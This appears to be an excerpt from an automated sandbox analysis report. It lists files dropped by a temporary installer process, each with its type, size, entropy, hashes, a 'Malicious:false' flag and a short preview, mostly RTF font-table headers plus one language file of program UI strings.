                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):48225
                                                                                                                                                                                                                                                          Entropy (8bit):5.096715936522922
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:ss/Ly89zHebIrfVY9RtmIiRAN4UIRopxdRNudR5crHZi2drk7Y9mrjbmPObWPq6S:ssmpH84z8
                                                                                                                                                                                                                                                          MD5:2598048BFC64A464E54D6B415A7303E7
                                                                                                                                                                                                                                                          SHA1:6FD99F1B7BB146904F310EAA185C9BEF7794DB69
                                                                                                                                                                                                                                                          SHA-256:70C7A754C1EABFA6640D343B1CCF2F773DED987C88AC8F90331AC7DBD1B308AD
                                                                                                                                                                                                                                                          SHA-512:D50B166D6FD03868343EB90C549A7D0D6E6E72AB3A8C73A48E7FCB80AC17BD595BE237C7AEFEE47E1AE9BA80FA5C2DA9800F9A4562E7D99E7006EC89C626A2F7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f40\fbidi \fswiss\fcharset0\fprq2{\*\panose 00000000000000000000}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):53088
                                                                                                                                                                                                                                                          Entropy (8bit):5.091636989377984
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:ss/Ly89zHebIrXWeKyggjmvOnaCwL9W1bd5JIyyFXMjjv0dp+ILGmx5BfQNCrli8:ssm1Gg4zO
                                                                                                                                                                                                                                                          MD5:505DFAF995C4EA7441C48E99C6400772
                                                                                                                                                                                                                                                          SHA1:26C112D3664663D7B9618D11D9BF7C893DAD3A1A
                                                                                                                                                                                                                                                          SHA-256:6D87327F851810F5CC1844EC1A39ACC0390EFB02284094EC53AF1CD4CE8CA3B2
                                                                                                                                                                                                                                                          SHA-512:2F190B4882D740DB06E90532905A6A0EEBC73AC06D581FE993254C0E23A46E7DAAD5F63D0FF643F258D5603B6E866D8AC2447F336F109116777AB49FD824D356
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f40\fbidi \fswiss\fcharset0\fprq2{\*\panose 00000000000000000000}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):61090
                                                                                                                                                                                                                                                          Entropy (8bit):5.061944824308056
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:s8/N3CelQcu09coHJreOBnAF3vlmgaJnAF3vlmgaiSN4UIRopZMggLBbWmb8Sw1w:s85g+X4zR
                                                                                                                                                                                                                                                          MD5:F233DF0C1E13DC0EC1FBC3DFE59E36FA
                                                                                                                                                                                                                                                          SHA1:A032C4D543AA03D01A28518894DD066D8682CE2C
                                                                                                                                                                                                                                                          SHA-256:B465F564E4A3FC70B8D12141C5CD4E1EA9C620D4B2A7A5DC84F54D8C5701F590
                                                                                                                                                                                                                                                          SHA-512:13CAF615E0EEEA67CD8037106E7714CACD72F4A74CB53561766D6D7546E97F62A390BB09FD5DFA3AAE56499E13CD699E13684181443E4361BECED33D8D6E26F9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):50648
                                                                                                                                                                                                                                                          Entropy (8bit):5.076966621667136
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:s8SW8t+CiBkyKWm+YqBjLW5qoqKZmbOTJbwQzgJetfBq4z+:s8f8Q4z+
                                                                                                                                                                                                                                                          MD5:927893BFF8C06F090F00A06389C24A42
                                                                                                                                                                                                                                                          SHA1:EADC77D6AAADC171CBF54B81A41930912803AAA0
                                                                                                                                                                                                                                                          SHA-256:37E18C594AA49F95B3CB800A7425EB6AD57FF8BAA97A523F971F8B9F77FC5F70
                                                                                                                                                                                                                                                          SHA-512:1DA7CA2795A54523DE39475A40832088924BFC49DD194A25E202C38D84F9A77389DEC2E612667C0D036ED911F3136D2D23D52AA43C6251D712E43C470E1031C7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):52487
                                                                                                                                                                                                                                                          Entropy (8bit):5.092431049148049
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:ss/LF89zHebIrUQBkyKWm+2Ck4O6CFURooIniy+JcOerjj1oMUliJ/KK0KhKuiFq:ssZmQUw4zQ
                                                                                                                                                                                                                                                          MD5:CBF3434F05AFD39EAF4FF2766C533BCD
                                                                                                                                                                                                                                                          SHA1:A339CCBDD47201D50598801A53E979B0C0A52607
                                                                                                                                                                                                                                                          SHA-256:0F58E6C26916B5B1E7A9E1130C8EC22A08A2500972446EC232901013C7645A1B
                                                                                                                                                                                                                                                          SHA-512:2EB64B6B8625BF64341EAD806EBE07E3BCD954DEC97D50BD68E6990062C1EBAA7553EA2834D04291B4E103F28296BB1F4F5CA6182E143F07752AD375DC8C80DF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f40\fbidi \fswiss\fcharset0\fprq2{\*\panose 00000000000000000000}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):51302
                                                                                                                                                                                                                                                          Entropy (8bit):5.092103345877651
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:ss/LF89zHebIrmQBkyKWm+eCk4O6Cg2NjrOX/zJ0PfOyGlgOYBJiDBNBiOl/Vq/M:ssZdBa4zS
                                                                                                                                                                                                                                                          MD5:E5A9141385B035A9DA437DD1F1083F69
                                                                                                                                                                                                                                                          SHA1:A6959E190DCDAD51B46960285E8EFBE532648E7A
                                                                                                                                                                                                                                                          SHA-256:F5F01449E3735132C0A835E6F6A6E9810BF63592073AD66273F6DFEAE36EB41A
                                                                                                                                                                                                                                                          SHA-512:A7B6E252D2B28977A1C1699582BC66B40D99D4B18F47CA78BAFF8D5D0EED592FF6FD9E98E3C10658823A586244CA08A8EDD8A8B1B9B391881C7794E1F0C5EED6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f40\fbidi \fswiss\fcharset0\fprq2{\*\panose 00000000000000000000}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):54763
                                                                                                                                                                                                                                                          Entropy (8bit):5.086159865228289
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:ss/LF89zHebIrIQBkyKWm+2Ck4O6CFURooIniyl+n6S8aG+8Iu/wj5XvSTp5kiWz:ssZVpy4zU
                                                                                                                                                                                                                                                          MD5:FE0FD5197CD49B1818CD102069665E64
                                                                                                                                                                                                                                                          SHA1:313F0DF1F4B687043DAED9B1BB783BA36F8F1BC4
                                                                                                                                                                                                                                                          SHA-256:787E3B3DBC3E1DE91DD2C786085ED70616AF51B843C56B88541B40601390E055
                                                                                                                                                                                                                                                          SHA-512:B24055EE351C5973DF4C42D678A59F84EE4F7447AEDA49581413E97CBA59C0DF1F2E5712BC31C2F94FA399214208BBB9F1C6AE3EA6BB439728D1C5C5D156F96F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f40\fbidi \fswiss\fcharset0\fprq2{\*\panose 00000000000000000000}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):40943
                                                                                                                                                                                                                                                          Entropy (8bit):5.062621250408577
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:pqeS48Um0GhbtabQhOsWx/LCrLXI1n8T2njX8x3Ftt4MfRMIq818Z/6A9i:pqKH+qIA9i
                                                                                                                                                                                                                                                          MD5:E2D6C3DBD79C905DABE49F310F9A134E
                                                                                                                                                                                                                                                          SHA1:072CB75BBAD6904B39757E423EEDA0F3CA9FA8D7
                                                                                                                                                                                                                                                          SHA-256:0A9C5D645D90A6D3CA88495DE5D0410CE8456C6AF5C0D56E4F225B81CECC0069
                                                                                                                                                                                                                                                          SHA-512:EEC29BB5020AE654E7A0DB369722B1AD8286D97288C40E009B26AD20A2A9CD661B5AE9CCFFF7629B378EFC98AFA505F933F36C2AF0A49E7C7FD35D3925B0BF42
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):15013
                                                                                                                                                                                                                                                          Entropy (8bit):6.013025249187838
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:9DL/YIoCnMY+innEvlPTgFQXU516bXHsFAp/JfloqJPeNKi:9DL/YIoCnMMnEpEXyb3cAtJfav
                                                                                                                                                                                                                                                          MD5:98FE3D6DA49E6A81B5C6A5D5ABF2E69A
                                                                                                                                                                                                                                                          SHA1:A90458B40E3559466180B29822E0E83CC3000632
                                                                                                                                                                                                                                                          SHA-256:FB966B8124C5CEDCEC536B5DFE54168F7AA07DC9717D4099EA67A8DF72342F50
                                                                                                                                                                                                                                                          SHA-512:EA826D7205C882B74D20A4A0499A2966F47BD88CE01326D55B105BAA267606FE0F5C20F995762CC5E320F1273E4C06B0E6840815F2E2601A59CF7F3B12B25372
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.[LngFile]..###############################################################################..####### ....... "=".......! ############..###############################################################################..tbStart=".."..tbStartHint="...."..tbStop=".."..tbStopHint="...."..tbFind=".."..tbFindHint="......"..tbSetting=".."..tbSettingHint="...."..tbAbout=".."..tbAboutHint=".. / ...."..tbHomePage=".."..tbHomePageHint="......"..tbToday=".."..tbTodayHint="......"..tbHide=".."..tbHideHint="................"..tbMinimize="..."..tbMinimizeHint="......"..tbExit=".."..tbExitHint="......."..gbLog="...."..tCurrLogSize="....(Mb)"..tCurrScrSize="......(Mb)"..tCurrSnpSize=".........(Mb)"..tCurrSoundsSize="...... (Mb)"..tCurrVideosSize=".
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):52052
                                                                                                                                                                                                                                                          Entropy (8bit):5.0423517848490995
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2eFD747+kxKTllT2njX8x3xezX3MmwxXoC+zKjkMpEZI6xAzj54vWHmI9ikzmind:2ee2XMIA9o
                                                                                                                                                                                                                                                          MD5:86DF8DBFBB9E6B68A8255BF9B36A9A79
                                                                                                                                                                                                                                                          SHA1:49BBA097A2FA7B3AA66E58F2ECCB244444C96AD3
                                                                                                                                                                                                                                                          SHA-256:232B3BC657DA966541951F2BCAD65B0394BA11608B61F60732E9049B70D8C46D
                                                                                                                                                                                                                                                          SHA-512:BE429F10D254B65E0DEBA90598DEF9ABACD7C641FDF418B7FA272DED99ABA0A3C6E91CF002CEFDB43D95F54466CD0631326788D6E59628ED0A7922422E530F5A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Time
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44042
                                                                                                                                                                                                                                                          Entropy (8bit):5.0382315831173985
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2QFDC47+EpRx1IKZR1yc+rROcPI0QhhiLVRtvYq14MfzCJrUwQpd8HZ/6A9u:2QDFUnUIA9u
                                                                                                                                                                                                                                                          MD5:C87126C1EBFECCC1BE9D35D2C25360F3
                                                                                                                                                                                                                                                          SHA1:9968DE7D3CAA691A6EB0E643E643C34B7B044F55
                                                                                                                                                                                                                                                          SHA-256:0965D39B40A80B7EF5452ACEEEC9CE43CC5C8D6762617F8FF907444377844D14
                                                                                                                                                                                                                                                          SHA-512:0AA0315529CA2C5D04F4A5BF4DE4991C2F8551AA38559D5C6AAD87F363B1D806457C3F33274873CFCF661646FBE2F730A4461D6ADE66C2DB36BD13AFAD5F1849
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe2052\themelang1049\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\f40\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}@SimSun;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt SimSun};}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):45546
                                                                                                                                                                                                                                                          Entropy (8bit):5.037437776894658
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2QFDC47+HE1KEKT2njX8x3FPzX3Mmwx1DVw22vR4YaxZ8Y21kNFp6VpXGEy5Z/61:2QDnocIA9K
                                                                                                                                                                                                                                                          MD5:04CD296601A182A19484D83613BC117B
                                                                                                                                                                                                                                                          SHA1:3ACCD6A59B0E72F4FC2D6559D9C31A89C25383B9
                                                                                                                                                                                                                                                          SHA-256:0ABEDA0EF9D4D06BC44EDFF51C9A289DBA0F58A672731F0F8A1B09AFCFD7C9B7
                                                                                                                                                                                                                                                          SHA-512:12241D241CB7FE1A79009E1B4BEB7E9051A5523A3A4182BC19E52EAA3FED4D334822D4DD2E8F2DC3EA56AD32E121C7D69D0C7EB1D1495C5132DC460B5002D0E2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
